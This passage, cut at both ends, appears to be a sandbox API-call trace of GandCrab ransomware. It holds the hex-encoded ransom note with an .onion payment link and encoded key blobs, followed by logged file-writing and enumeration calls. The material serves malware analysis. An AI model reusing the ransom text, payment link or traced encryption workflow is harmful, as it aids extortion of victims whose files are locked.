a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0088.539] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0088.540] CloseHandle (hObject=0x2bc) returned 1 [0088.540] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.540] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.540] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x21, wMilliseconds=0x356)) [0088.540] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.541] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0088.541] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0088.541] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\d2ca4a09d2ca4deb61a.lock") returned 87 [0088.541] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\alha3auz\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0088.541] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.541] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.542] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\") returned 63 [0088.542] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\*" [0088.542] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\alhA3aUz\\*", 